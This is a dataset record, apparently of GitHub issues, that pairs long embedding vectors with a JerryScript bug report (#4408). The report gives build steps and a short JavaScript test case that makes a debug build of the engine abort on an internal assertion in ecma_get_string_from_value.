-0.017415069043636322, 0.00621208269149065, -0.007766999304294586, 0.001007851562462747, 0.0026262926403433084, -0.016990311443805695, 0.000285147107206285, 0.000675061484798789, -0.0079793781042099, -0.005878344178199768, 0.004653373267501593, -0.02801884338259697, 0.0023342715576291084, -0.0072057126089930534, -0.010952683165669441, -0.017627447843551636, -0.0008665817440487444, -0.03300974890589714, 0.013258511200547218, 0.0037905839271843433, -0.018916891887784004, -0.014540369622409344, -0.015412639826536179, -0.0027836805675178766, 0.015200261026620865, -0.033404164016246796, -0.002558027859777212, -0.04062504693865776, -0.009003347717225552, 0.029080739244818687, 0.002017599530518055, -0.013167491182684898, -0.005191905423998833, -0.006940238643437624, -0.006591330748051405, -0.0012439335696399212, 0.009314331226050854, 0.0019664010033011436, 0.016292495653033257, -0.012393825687468052, -0.023452697321772575, -0.0013984771212562919, -0.01421421580016613, -0.02516689896583557, 0.015298864804208279, 0.016216645017266273, -0.043901752680540085, 0.003985896706581116, -0.007873188704252243, -0.010626529343426228, -0.00019768302445299923, -0.008351041004061699, -0.02196604572236538, -0.011043702252209187, 0.03279737010598183, 0.002650943584740162, 0.012371070683002472, 0.007319486699998379, 0.005006073974072933, 0.0027211045380681753, -0.02371058613061905, -0.015670528635382652, 0.012181446887552738, 0.011392610147595406, -0.010770644061267376, -0.00001433290890417993, 0.008988178335130215, 0.0035668276250362396, -0.019129270687699318, 0.02003946527838707, 0.009268821217119694, 0.029611686244606972, 0.004130010958760977, -0.005169150419533253, -0.015496074222028255, 0.0036521584261208773, 0.003119315020740032, -0.0038550561293959618, 0.015594678930938244, 0.003318420145660639, -0.002523895585909486, -0.00618932768702507, -0.0013235756196081638, -0.028898699209094048, -0.006769577041268349, 0.013539154082536697, -0.006102100480347872, -0.008358626626431942, -0.008282776921987534, 0.008730289526283741, 0.006598915439099073, -0.00373180047608912, -0.012674468569457531, 0.00154448754619807, 0.026426002383232117, 0.006352404598146677, -0.0003197534824721515, -0.0061324406415224075, -0.012287636287510395, -0.010103167034685612, -0.020888980478048325, -0.0018592634005472064, 0.004842997062951326, 0.008396551012992859, 0.010125922039151192, -0.013751532882452011, 0.013683268800377846, 0.01315990649163723, -0.0010495688766241074, 0.014373499900102615, -0.011172646656632423, 0.017718467861413956, 0.010800983756780624, 0.004888507071882486, 0.002556131687015295, 0.004080708604305983, -0.009230896830558777, -0.007964208722114563, 0.0073232795111835, -0.016580723226070404, -0.015003051608800888, -0.007368789054453373, -0.01806737668812275, 0.002717312192544341, -0.0014288169331848621, 0.022982429713010788, 0.016064945608377457, -0.021283399313688278, 0.013281266205012798, 0.011089212261140347, 0.006485141348093748, -0.0035971675533801317, 0.009010933339595795, 0.007626677863299847, 0.012173861265182495, -0.015898076817393303, 0.007285354658961296, -0.012242126278579235, 0.004266540054231882, -0.015124411322176456, -0.013774287886917591, 0.013781873509287834, 0.009754259139299393, -0.006496518850326538, 0.024469083175063133, 0.012674468569457531, 0.001021125353872776, 0.009625314734876156, 0.0011263666674494743, -0.01893206126987934, 0.00228117685765028, 0.010034902952611446, 0.0032767029479146004, 0.00748635595664382, -0.024863500148057938, 0.01533679012209177, -0.010209356434643269, 0.0008068501483649015, 0.0031534472946077585, -0.017946016043424606, -0.01157464925199747, 0.010353471152484417, -0.012280050665140152, -0.0031648247968405485, 0.010087997652590275, -0.018552813678979874, 0.004490296356379986, 0.021480608731508255, 0.013470890000462532, -0.0011728245299309492, -0.00307759759016335, -0.001011644140817225, 0.011567064560949802, -0.0005465912399813533, -0.006185535341501236, -0.01027003675699234, 0.0013833071570843458, 0.018234245479106903, -0.004293087404221296, -0.0035383841022849083, -0.006196912843734026, -0.007683564908802509, 0.005775947589427233, -0.008328286930918694, -0.0019493348663672805, 0.026896269991993904, 0.000895499368198216, 0.029414476826786995, 0.01604977622628212, 0.010027317330241203, -0.022026725113391876, 0.022345293313264847, -0.002307724207639694, -0.011771858669817448, -0.001796687487512827, 0.010072827339172363, 0.005191905423998833, 0.0077556222677230835, -0.011862877756357193, -0.013508814387023449, 0.02146543748676777, 0.0009130396065302193, -0.0072815618477761745, 0.020524902269244194, -0.010285206139087677, 0.011915972456336021, 0.009526710025966167, 0.006591330748051405, 0.008419306017458439, -0.0037090457044541836, 0.00011881129466928542, -0.005446001421660185, 0.004255163017660379, 0.006303102243691683, 0.0283829215914011, -0.03234227001667023, 0.0049036769196391106, -0.005798702128231525, 0.022800391539931297, -0.023831944912672043, 0.012947527691721916, 0.016580723226070404, -0.01318266149610281, -0.01345571968704462, -0.013781873509287834, -0.007342241704463959, 0.009913543239235878, -0.0035914788022637367, 0.02783680520951748, 0.005127433221787214, 0.00800213310867548, 0.013357114978134632, 0.0005537021206691861, 0.008267606608569622, 0.007789754308760166, -0.007562205661088228, -0.015928417444229126, -0.011476045474410057, 0.004406861960887909, 0.002836775267496705, -0.02058558352291584, -0.0049036769196391106, -0.023043109104037285, 0.02668389119207859, 0.0008822256932035089, 0.01176427397876978, -0.019963616505265236, -0.02219359390437603, -0.010816153138875961, -0.014373499900102615, 0.005950401537120342, 0.013789458200335503, 0.023164469748735428, -0.0020934490021318197, -0.010694794356822968, -0.007065390702337027, -0.006693727802485228, 0.016884122043848038, 0.007774584461003542, -0.006534443236887455, -0.023877454921603203, -0.011172646656632423, 0.013728778809309006, 0.0005603389581665397, 0.00457373121753335, 0.022952090948820114, 0.007842849008738995, -0.019478177651762962, -0.016884122043848038, -0.021162040531635284, -0.00939776562154293, 0.0038531599566340446, -0.004262747708708048, -0.022223934531211853, -0.009936298243701458, -0.03819786012172699, 0.020479394122958183, -0.007012296002358198, -0.02738170698285103, 0.0023494414053857327, 0.0038304049521684647, -0.001615596585907042, -0.0022356670815497637, 0.0056925127282738686, 0.008108322508633137, 0.02563716657459736, -0.0035801013000309467, -0.03398062288761139, 0.014449349604547024, 0.0019019288010895252, -0.0077442447654902935, 0.01743023842573166, -0.00988320354372263, 0.005241207778453827, -0.004729222971946001, 0.004679920617491007, -0.0020479392260313034, 0.0002557553816586733, -0.027078308165073395, -0.004205860663205385, 0.011536724865436554, 0.006519273389130831, -0.0005736126331612468, 0.0007513851160183549, 0.015503658913075924, 0.0004017658648081124, 0.0073498268611729145, -0.0018630558624863625, 0.028458772227168083, -0.017278539016842842, -0.014274895191192627, -0.006682350300252438, -0.002829190343618393, 0.011984237469732761, -0.018871381878852844, -0.020236674696207047, -0.008449645712971687, -0.0023020354565232992, 0.011855293065309525, -0.00869236420840025, 0.006720275152474642, -0.0075773755088448524, -0.01636834442615509, -0.009299161843955517, -0.00832070130854845, 0.0008296050364151597, -0.001334953005425632, 0.010702379047870636, -0.013341945596039295, 0.017490919679403305, 0.010785813443362713, 0.0032520517706871033, -0.006966785993427038, -0.015048561617732048, 0.019872596487402916, -0.014745162799954414, -0.004683712963014841, -0.004160350654274225, 0.0005949453334324062, 0.008555835112929344, -0.026213623583316803, -0.0011055079521611333, 0.021844686940312386, -0.0016971349250525236, -0.018143225461244583, -0.01313715148717165, -0.026122603565454483, 0.016580723226070404, -0.007581167854368687, 0.01682344265282154, -0.017551599070429802, 0.00507813086733222, 0.004141388460993767, 0.015086486004292965, 0.012234541587531567, 0.016489703208208084, 0.007091938052326441, 0.0045433915220201015, 0.004410654306411743, 0.029308287426829338, -0.005453586578369141, 0.0022261859849095345, 0.01560984831303358, -0.015131996013224125, 0.004281710367649794, 0.004490296356379986, 0.0022223934065550566, 0.016429023817181587, 0.008260021917521954, 0.002019495703279972, 0.006940238643437624, 0.004456164315342903, -0.011400195769965649, 0.020024295896291733, 0.01199182216078043, 0.0004958668141625822, 0.010664454661309719, 0.005851796828210354, 0.008775799535214901, 0.0008049539173953235, 0.014350744895637035, 0.009375011548399925, 0.009496370330452919, -0.011036117561161518, -0.008252437226474285, 0.013402624987065792, 0.00981493853032589, 0.017642617225646973, -0.015306450426578522, 0.017870167270302773, -0.002823501592501998, -0.00620070518925786, -0.0008779591880738735, -0.012674468569457531, -0.012621373869478703, 0.00671648234128952, -0.011074041947722435, 0.021708156913518906, 0.021981215104460716, 0.009526710025966167, -0.0022660070098936558, -0.014396254904568195, 0.0009803561260923743, -0.00374317797832191, 0.009268821217119694, -0.03310076892375946, -0.019144440069794655, -0.02489384077489376, 0.002389262430369854, -0.0006556250154972076, -0.012386240065097809, -0.010004563257098198, 0.005358774680644274, -0.008169002830982208, -0.00229255435988307, -0.01990293711423874, -0.0020801753271371126, 0.026350151747465134, 0.014244555495679379, 0.004368937108665705, 0.010952683165669441, 0.022314954549074173, -0.021844686940312386, 0.014737578108906746, -0.0029107285663485527, 0.021859856322407722, 0.002123788930475712, -0.013797042891383171, -0.005104678217321634, 0.013440550304949284, -0.006542028393596411, -0.004490296356379986, 0.004649580921977758, -0.011878048069775105, 0.01943266950547695, 0.00749773345887661, 0.013834968209266663, -0.010861663147807121, 0.005957986228168011, -0.008184172213077545, 0.01568569801747799, -0.00002613255855976604, -0.006591330748051405, 0.024059494957327843, 0.01024728175252676, -0.002129477681592107, 0.009412935934960842, 0.005351189523935318, 0.009913543239235878, -0.005438416730612516, 0.010391395539045334, -0.010444490239024162, -0.0017900506500154734, -0.013311605900526047, 0.00040863975300453603, 0.013364700600504875, 0.014858937822282314, 0.009155047126114368, 0.022770050913095474, -0.005669757723808289, -0.0028481525368988514, 0.004422031808644533, 0.010823738761246204, -0.018810702487826347, -0.017217859625816345, 0.004721637815237045, -0.0159587562084198, 0.0005072442581877112, -0.006466178689152002, -0.0015293176984414458, -0.005533228628337383, -0.0015805161092430353, -0.01013350673019886, 0.005294302478432655, 0.0035535539500415325, 0.002558027859777212, -0.0032729103695601225, 0.021708156913518906, 0.03234227001667023, 0.005108471028506756, -0.003081390168517828, -0.004930224269628525, 0.004960563965141773, -0.018173566088080406, -0.0030339842196553946, -0.023649906739592552, 0.0007637107046321034, -0.003187579568475485, -0.0038474712055176497, -0.009208141826093197, -0.004403069615364075, 0.006712689995765686, 0.007994548417627811, 0.0032710141967982054, 0.002705934690311551, 0.005404284223914146, 0.004945394117385149, 0.01715718023478985, 0.013956326991319656, 0.005074338521808386, 0.0053094723261892796, -0.015374714508652687, -0.005119848530739546, 0.0017644513864070177, 0.02072211168706417, -0.004463749006390572, 0.03479979932308197, 0.024605611339211464, 0.00747497845441103, 0.010125922039151192, 0.01237865537405014, -0.013683268800377846, -0.01134710106998682, 0.01102853287011385, 0.00871511921286583, 0.014843767508864403, 0.025606825947761536, -0.0025826790370047092, -0.008980592712759972, 0.006966785993427038, 0.01797635667026043, -0.00318189081735909, 0.009549465030431747, 0.006250007543712854, -0.01022452674806118, 0.012181446887552738, -0.008957838639616966, 0.004778524860739708, 0.015898076817393303, -0.0027836805675178766, 0.001538798795081675, -0.02283073030412197, 0.006796124391257763, 0.04153524339199066, -0.00691369129344821, 0.002133270027115941, -0.0031856833957135677, 0.005347397178411484, -0.028049184009432793, -0.02003946527838707, 0.021799176931381226, -0.009086783044040203, 0.007057805545628071, 0.007740451954305172, -0.0080931531265378, -0.006602708250284195, -0.011020947247743607, -0.006428253836929798, -0.004020029213279486, 0.012386240065097809, 0.013994252309203148, -0.028807679191231728, 0.012644128873944283, 0.015928417444229126, -0.040230631828308105, -0.005260169971734285, 0.01668691262602806, 0.011043702252209187, -0.002920209662988782, -0.009936298243701458, -0.02026701346039772, -0.0016487807733938098, -0.002106722677126527, -0.007118485402315855, 0.004706467967480421, -0.019933275878429413, -0.015882907435297966, -0.025804035365581512, -0.02389262616634369, -0.020782791078090668, 0.006227252539247274, 0.016565553843975067, 0.016611063852906227, -0.025303427129983902, 0.008699949830770493, 0.00988320354372263, -0.0004479867347981781, 0.012553109787404537, -0.012848922982811928, -0.003997274208813906, 0.00017552071949467063, -0.0323726125061512, 0.012462089769542217, 0.009685994125902653, 0.00992871355265379, -0.0030719090718775988, 0.005586323328316212, 0.0008405084372498095, 0.016747592017054558, -0.016671743243932724, 0.001202216255478561, -0.0006982904160395265, -0.008548250421881676, 0.016429023817181587, -0.00942052062600851, 0.0026300849858671427, 0.014108026400208473, 0.0016487807733938098, 0.018583152443170547, -0.017642617225646973, -0.005995911080390215, -0.0006134336581453681, 0.018628662452101707, 0.013668098486959934, -0.022845901548862457, -0.007084352895617485, -0.007660809904336929, -0.008571005426347256, 0.0024518384598195553, -0.0010761162266135216, -0.0011567064793780446, -0.010148677043616772, 0.006890936754643917, -0.006261385045945644, 0.009321916848421097, 0.012993037700653076, 0.018325263634324074, 0.0189775712788105, 0.012166276574134827, -0.013607419095933437, 0.020706942304968834, -0.00672785984352231, 0.0071943351067602634, -0.009701164439320564, -0.0032729103695601225, -0.023452697321772575, 0.0010239696130156517, 0.006151402834802866, 0.013387455604970455, -0.013842552900314331, -0.005821457132697105, -0.001804272411391139, -0.020206334069371223, -0.004384106956422329, 0.0033108352217823267, 0.018264584243297577, 0.01052792463451624, -0.010414150543510914, 0.02126822993159294, 0.025834375992417336, 0.01893206126987934, 0.026061924174427986, -0.023922964930534363, -0.0002222156326752156, -0.030521880835294724, -0.004202068317681551, 0.0105734346434474, -0.013417795300483704, -0.021328909322619438, 0.0005973156075924635, -0.028079522773623466, -0.01902308128774166, -0.004073123913258314, 0.02448425255715847, 0.01668691262602806, 0.0067544071935117245, -0.00752048846334219, 0.00024153359117917717, -0.0012126455549150705, 0.006231044884771109, 0.007596337702125311, 0.015200261026620865, 0.00401244405657053, 0.013584664091467857, 0.009283991530537605, -0.002920209662988782, -0.023225149139761925, 0.05415661633014679, 0.01313715148717165, 0.009678409434854984, 0.011878048069775105, -0.0015094071859493852, 0.010376226156949997, -0.006303102243691683, -0.0030415691435337067, -0.013258511200547218, 0.01724820025265217, 0.01668691262602806, 0.006014873739331961, 0.0033335902262479067, 0.002006222028285265, 0.001667743199504912, -0.00100595538970083, -0.007827679626643658, 0.0005745607777498662, -0.009435690939426422, -0.023634737357497215, -0.017870167270302773, 0.010376226156949997, 0.02888352982699871, -0.006003496237099171, 0.0029657194390892982, 0.008282776921987534, -0.009868033230304718, -0.0023589227348566055, 0.006128647830337286, 0.001467689871788025, 0.029217267408967018, -0.02314929850399494, -0.0013681371929123998, 0.010194187052547932, 0.005161565728485584, 0.008889573626220226, 0.018871381878852844, 0.021723326295614243, -0.004645788110792637, -0.015807056799530983, 0.003085182746872306, 0.012257295660674572, 0.001344434218481183, 0.016155965626239777, 0.0041375961154699326, 0.002711623441427946, 0.0037071495316922665, 0.004888507071882486, 0.006276554893702269, 0.021844686940312386, 0.026061924174427986, -0.0012505704071372747, -0.007342241704463959, 0.00021498622663784772, 0.006507895886898041, -0.013615003786981106, -0.010732718743383884, -0.003214126918464899, -0.0051539805717766285, -0.02255767211318016, -0.009617730043828487, -0.016611063852906227, -0.007050220854580402, -0.0030339842196553946, -0.029596514999866486, -0.007584960665553808, -0.00014932890189811587, 0.012886847369372845, -0.01237865537405014, 0.010687209665775299, 0.0008760629571042955, 0.005783532280474901, -0.012606204487383366, -0.00885164923965931, -0.007353619206696749, -0.009685994125902653, 0.005271547473967075, -0.0068871439434587955, 0.004459956660866737, -0.0011699801543727517, 0.004956771619617939, -0.00836621131747961, -0.0017587627517059445, -0.004698882810771465, 0.00747497845441103, -0.007372581399977207, 0.00512364087626338, -0.007789754308760166, -0.014039761386811733, 0.026623211801052094, 0.008608929812908173, 0.0013804627815261483, -0.02187502570450306, -0.007361203897744417, 0.020524902269244194, 0.0005257325829006732, -0.005336019676178694, -0.01054309494793415, -0.0035649314522743225, 0.01600426621735096, -0.0033335902262479067, 0.008730289526283741, -0.02475731074810028, -0.005377736873924732, 0.004816449712961912, -0.02094965986907482, 0.0026300849858671427, -0.013061301782727242, -0.009526710025966167, 0.000416935799876228, 0.005389114376157522, 0.001215489930473268, -0.01985742710530758, -0.004190690815448761, 0.01380462758243084, 0.013250925578176975, 0.005946609191596508, 0.009739088825881481, 0.018992740660905838, 0.007603922858834267, -0.008995763026177883, -0.011074041947722435, 0.028731830418109894, 0.011567064560949802, 0.014456934295594692, -0.004884714726358652, 0.01531403511762619, 0.02568267658352852, 0.003475808072835207, 0.0013273680815473199, -0.011529140174388885, -0.01788533665239811, 0.016944801434874535, 0.00942052062600851, 0.004626825917512178, 0.020782791078090668, -0.012242126278579235, 0.012765488587319851, 0.02214808389544487, 0.004357559606432915, 0.002679387340322137, 0.057008564472198486, 0.000333738251356408, 0.00876062922179699, -0.015625018626451492, -0.0026547361630946398, 0.014343160204589367, 0.006401706486940384, 0.004346182104200125, -0.022405972704291344, 0.012219371274113655, 0.004429616965353489, -0.006864389404654503, 0.004778524860739708, -0.007410506252199411, 0.017278539016842842, 0.015670528635382652, 0.0064699710346758366, -0.016110455617308617, 0.005529436282813549, 0.005097093526273966, 0.013789458200335503, 0.004395484458655119, 0.00836621131747961, 0.013986666686832905, -0.009132292121648788, 0.004968149121850729, -0.015306450426578522, 0.009359841234982014, -0.00981493853032589, -0.024726971983909607, -0.011354685761034489, 0.006049005780369043, -0.009868033230304718, 0.017506089061498642, 0.016793102025985718, 0.020373202860355377, 0.007717697415500879, 0.0069326539523899555, 0.008616515435278416, 0.011529140174388885, -0.002125685103237629, -0.0030036442913115025, 0.03085561841726303, 0.040928445756435394, -0.010080412030220032, -0.015435394831001759, -0.0047254301607608795, 0.0024461497087031603, -0.012704809196293354, -0.002967615844681859, -0.006147610489279032, 0.00807039812207222, 0.005609078332781792, -0.006625462789088488, 0.016489703208208084, 0.021450268104672432, -0.020964831113815308, 0.037348344922065735, -0.00589351449161768, -0.0023646114859730005, -0.025242747738957405, -0.022390803322196007, 0.008631684817373753 ]
2,060
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ··· ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ··· ###### Test case ··· var count = "0000"; var arr = new Array(10); function func(val) { try { Object.prototype.__defineGetter__(/(?<=^abc)def/); } catch(e) {} /(?<a>a)/[Symbol.replace] = arr; try { arr.concat(arr, new Symbol('1')); } catch(e) {} } func(new Proxy(func, [])); ··· ###### Output ··· ICE: Assertion 'ecma_is_value_string (value)' failed at /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_string_from_value):791. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted ··· Credits: Found by chong from OWL337.
Assertion 'ecma_is_value_string (value)' in ecma_get_string_from_value
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4408/comments
0
2021-01-04T13:32:09
2021-01-07T16:19:53Z
https://github.com/jerryscript-project/jerryscript/issues/4408
778,097,382
4,408
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'ecma_is_value_string (value)' in ecma_get_string_from_value Issue date: --- start body --- ###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ··· ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ··· ###### Test case ··· var count = "0000"; var arr = new Array(10); function func(val) { try { Object.prototype.__defineGetter__(/(?<=^abc)def/); } catch(e) {} /(?<a>a)/[Symbol.replace] = arr; try { arr.concat(arr, new Symbol('1')); } catch(e) {} } func(new Proxy(func, [])); ··· ###### Output ··· ICE: Assertion 'ecma_is_value_string (value)' failed at /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_string_from_value):791. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted ··· Credits: Found by chong from OWL337. --- end body ---
1,245
[ 0.006173843517899513, 0.004778142087161541, -0.005216078832745552, -0.009762790985405445, 0.006123997271060944, -0.0013333936221897602, 0.0007601589313708246, 0.033240485936403275, -0.06255022436380386, -0.002353466348722577, -0.01965375803411007, 0.028469465672969818, 0.0025617533829063177, 0.031047241762280464, -0.006213008891791105, 0.029736990109086037, -0.016606001183390617, 0.004820867441594601, -0.02839825674891472, -0.009250083938241005, 0.010603060014545918, 0.02062220498919487, -0.046399958431720734, 0.023029077798128128, -0.023413607850670815, 0.009955056011676788, -0.007946954108774662, -0.0024834233336150646, 0.002184344222769141, -0.01187770627439022, -0.014562295749783516, -0.017560206353664398, -0.02613380178809166, 0.026504090055823326, 0.025492917746305466, 0.008053768426179886, 0.01834350824356079, 0.05141309276223183, 0.00006575731094926596, -0.028939446434378624, -0.014426997862756252, -0.044178228825330734, -0.026546815410256386, 0.027971001341938972, 0.02928125113248825, 0.05867643654346466, 0.01626419648528099, 0.01239753421396017, -0.023641478270292282, 0.018799247220158577, 0.020223433151841164, -0.0019831780809909105, 0.003553342539817095, -0.04426368325948715, 0.031018758192658424, 0.0007899778429418802, 0.0174889974296093, -0.017830800265073776, 0.031189659610390663, -0.013957017101347446, -0.01196315698325634, 0.0008696431759744883, -0.016762662678956985, 0.007975437678396702, 0.017745349556207657, 0.05964488536119461, -0.0033610775135457516, -0.0082246707752347, 0.03594643995165825, 0.03175933286547661, 0.010026264935731888, -0.014811527915298939, 0.04642844200134277, 0.06636703759431839, -0.004272555932402611, -0.007726205512881279, 0.01312386803328991, 0.03828210383653641, -0.025749271735548973, -0.010004902258515358, -0.016648726537823677, 0.018642587587237358, 0.0029854485765099525, -0.00823891256004572, 0.000526503543369472, 0.0024406977463513613, -0.0035515623167157173, -0.07194984704256058, -0.01952558197081089, 0.006921540945768356, -0.023655720055103302, 0.012753579765558243, -0.0271307323127985, 0.0012657447950914502, -0.018115637823939323, 0.03993415832519531, -0.016791146248579025, 0.0020668490324169397, -0.05132764205336571, 0.010403674095869064, 0.024310844019055367, 0.0023374443408101797, -0.011799375526607037, -0.0029961299151182175, -0.007291829213500023, 0.03047756664454937, 0.022459402680397034, -0.01620722934603691, 0.062379319220781326, 0.117125004529953, 0.0014455481432378292, -0.029566088691353798, -0.0017054619966074824, -0.04340916872024536, 0.0005135968676768243, 0.02717345766723156, -0.003332593711093068, -0.004486184101551771, 0.004706932697445154, 0.031104208901524544, -0.04688418284058571, -0.0005487564485520124, -0.013515518978238106, -0.01630692183971405, -0.0030370752792805433, 0.028583399951457977, 0.02396903932094574, 0.014270337298512459, 0.01184922270476818, -0.01362233329564333, -0.06944327801465988, -0.009655976668000221, 0.000572344521060586, -0.0016636265208944678, 0.04867865517735481, -0.0059317322447896, -0.020422818139195442, 0.05830615013837814, -0.01830078288912773, -0.046172089874744415, -0.05466023460030556, -0.022003663703799248, 0.03560463339090347, 0.011236822232604027, 0.00410521449521184, -0.019995562732219696, 0.008452540263533592, 0.028825512155890465, -0.017147192731499672, 0.007954075001180172, -0.00628065736964345, -0.015865424647927284, 0.0003079800808336586, 0.017702624201774597, 0.030762404203414917, -0.018841972574591637, 0.0023071803152561188, 0.02291514351963997, 0.010482004843652248, 0.010667148977518082, -0.049333781003952026, -0.02811341919004917, -0.010887897573411465, -0.007868624292314053, -0.03591795638203621, 0.0002244204661110416, -0.027529504150152206, 0.0239405557513237, -0.011450450867414474, 0.023513300344347954, -0.00039209602982737124, 0.01358672883361578, 0.03933599963784218, 0.027415568009018898, -0.027614954859018326, -0.0034963751677423716, 0.010054748505353928, 0.02495172806084156, 0.005326453130692244, -0.01413504034280777, -0.010880776681005955, 0.017702624201774597, -0.01630692183971405, -0.006526329554617405, 0.04147227853536606, -0.029964860528707504, -0.007733326405286789, -0.023313915356993675, 0.01355112437158823, -0.03586098924279213, -0.009043577127158642, 0.015950875356793404, -0.011806496419012547, 0.015238783322274685, 0.014256095513701439, 0.0237269289791584, -0.009969297796487808, -0.04990345612168312, 0.0011607110500335693, -0.037484560161828995, 0.03024969808757305, -0.02277272380888462, -0.03033514879643917, -0.025934414938092232, -0.013957017101347446, -0.023285431787371635, -0.006964266300201416, 0.01251146849244833, 0.009015093557536602, 0.021405506879091263, -0.011799375526607037, -0.018671071156859398, 0.033297453075647354, -0.03597492352128029, -0.0076549965888261795, -0.0018407596508041024, -0.0017864624969661236, 0.005789313465356827, -0.017745349556207657, -0.008452540263533592, 0.0027985242195427418, -0.02287241816520691, -0.05118522420525551, -0.021348539739847183, -0.060271523892879486, -0.03831058740615845, -0.010040506720542908, 0.001717033446766436, -0.028013726696372032, 0.03569008409976959, -0.004144379403442144, -0.004817306995391846, -0.016492066904902458, 0.010973348282277584, 0.024481747299432755, -0.01027549710124731, -0.011130008846521378, -0.02928125113248825, 0.0013503057416528463, 0.006241492461413145, 0.0002561308501753956, -0.006839650217443705, -0.04016202688217163, -0.03987719118595123, 0.008858432993292809, 0.009777032770216465, -0.027743130922317505, -0.017118709161877632, -0.010987590067088604, 0.023413607850670815, -0.033069584518671036, -0.023356640711426735, -0.005208957940340042, -0.015124849043786526, 0.001418844680301845, 0.01830078288912773, -0.012283599004149437, 0.03287019953131676, 0.00818906631320715, -0.0391366146504879, 0.022146083414554596, 0.01142196636646986, -0.03506344556808472, 0.04756779223680496, 0.023199979215860367, 0.007932712323963642, -0.05018829181790352, 0.0029587452299892902, -0.04021899402141571, -0.003216878743842244, 0.05867643654346466, -0.03241445869207382, -0.017645657062530518, 0.010731237009167671, -0.022373951971530914, 0.004386491142213345, -0.009214479476213455, 0.009727186523377895, -0.026546815410256386, -0.033012617379426956, 0.01617874577641487, 0.009086302481591702, 0.010026264935731888, 0.030762404203414917, 0.007875745184719563, 0.004076730459928513, 0.021006735041737556, -0.0024175546132028103, 0.0053727393969893456, -0.020066771656274796, -0.007840140722692013, -0.02059372141957283, -0.0013948115520179272, 0.012354807928204536, 0.0002187459758715704, -0.01199164055287838, -0.013992621563374996, -0.026746202260255814, 0.010417915880680084, 0.01959679089486599, -0.01744627021253109, -0.033012617379426956, -0.02062220498919487, 0.02489476092159748, -0.05198276787996292, 0.0014669109368696809, 0.014669109135866165, 0.0009292809409089386, -0.021989421918988228, -0.04050383344292641, 0.051527027040719986, -0.02496596984565258, 0.008936763741075993, -0.0058747646398842335, -0.027458293363451958, -0.006832529325038195, 0.045061226934194565, -0.004076730459928513, -0.01961103267967701, 0.018699554726481438, -0.015139090828597546, -0.029850926250219345, -0.03386712819337845, 0.004290358629077673, 0.04591573774814606, 0.014448360539972782, -0.024239635095000267, -0.0019724967423826456, -0.0499604232609272, -0.013387342914938927, 0.0001630024635232985, -0.016805388033390045, -0.037313658744096756, 0.02075038105249405, -0.034265901893377304, -0.05728073790669441, -0.04919136315584183, 0.0136721795424819, 0.021533682942390442, -0.01747475378215313, 0.008808586746454239, -0.0001967156131286174, -0.04483335465192795, 0.01640661619603634, 0.020437059924006462, 0.006647385191172361, 0.015509379096329212, 0.017004773020744324, 0.02488051913678646, -0.018030187115073204, 0.0008278077584691346, 0.02506566233932972, 0.01474031899124384, -0.013736267574131489, 0.03950690105557442, -0.03936448320746422, -0.021163394674658775, -0.016022086143493652, 0.014562295749783516, 0.023442091420292854, 0.0019262107089161873, -0.02274424023926258, 0.012796306051313877, 0.0009737867512740195, 0.03475012257695198, -0.033240485936403275, 0.015851182863116264, 0.017816558480262756, -0.013259165920317173, -0.025464434176683426, -0.03258536010980606, 0.03944993391633034, -0.009848241694271564, -0.007726205512881279, -0.0283128060400486, -0.027486778795719147, 0.006661626975983381, 0.0018710235599428415, -0.007263345643877983, 0.01251858938485384, -0.016506308689713478, -0.026788927614688873, 0.0392790324985981, -0.02703103795647621, 0.018870456144213676, 0.03947841748595238, -0.032072655856609344, 0.0434376560151577, 0.010560334660112858, -0.01309538446366787, -0.038623906672000885, 0.030733920633792877, -0.052694860845804214, -0.0261622853577137, -0.019069842994213104, 0.04460548609495163, -0.025749271735548973, -0.049419231712818146, 0.02811341919004917, -0.027543745934963226, -0.009777032770216465, -0.016620242968201637, -0.002123816404491663, -0.031930238008499146, 0.01080244593322277, 0.024524472653865814, -0.006070590112358332, -0.039649322628974915, 0.02919580042362213, 0.028939446434378624, 0.032158106565475464, -0.03258536010980606, 0.0012185686500743032, 0.014840011484920979, 0.04471942037343979, 0.03588947281241417, 0.031930238008499146, -0.04528909549117088, -0.0010076111648231745, -0.0124188968911767, -0.005443948786705732, -0.043950360268354416, 0.0389941968023777, 0.007825898937880993, 0.006601099390536547, -0.0369148850440979, -0.030619986355304718, 0.010439278557896614, 0.018001703545451164, -0.009627493098378181, -0.03446528688073158, -0.016990531235933304, 0.025193840265274048, 0.07041172683238983, -0.011130008846521378, -0.05665409564971924, -0.026874378323554993, -0.03238597512245178, -0.015153332613408566, 0.009969297796487808, 0.022288501262664795, 0.002004540991038084, -0.02272999845445156, -0.025877447798848152, -0.016791146248579025, -0.00013819048763252795, -0.05497355759143829, 0.004461260512471199, 0.0011188756907358766, 0.02922428399324417, 0.004308160860091448, 0.011713924817740917, -0.015324234962463379, 0.009620372205972672, 0.004311721306294203, 0.018186846747994423, -0.001219458761624992, -0.003254263661801815, 0.02186124585568905, 0.008708893321454525, -0.008822828531265259, 0.0041336980648338795, 0.009983539581298828, 0.008879795670509338, -0.029594572260975838, 0.026902861893177032, 0.03694336861371994, -0.04998890683054924, -0.0013369540683925152, -0.023427849635481834, 0.0011633813846856356, 0.002079310594126582, 0.003576485440135002, 0.019810419529676437, -0.0215764082968235, -0.011265306733548641, 0.01078820414841175, -0.009527800604701042, 0.03158843144774437, 0.011286669410765171, 0.004610800184309483, -0.014768802560865879, -0.033069584518671036, 0.0478811115026474, 